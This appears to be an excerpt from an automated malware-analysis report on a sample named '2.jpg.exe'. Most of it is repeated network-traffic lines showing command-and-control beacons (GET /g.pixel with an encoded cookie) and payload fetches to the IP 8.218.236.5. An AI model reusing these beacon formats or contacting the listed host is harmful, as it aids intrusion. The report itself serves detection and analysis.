Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.236.5

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06767AF5 GetTickCount,_malloc,htonl,recvfrom,WSAGetLastError,htonl,ioctlsocket,

0_2_06767AF5

Source: global traffic	HTTP traffic detected: GET /0.txt HTTP/1.1Host: 8.218.236.5:8089Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1.txt HTTP/1.1Host: 8.218.236.5:8089Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /j9sF HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; MALC)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
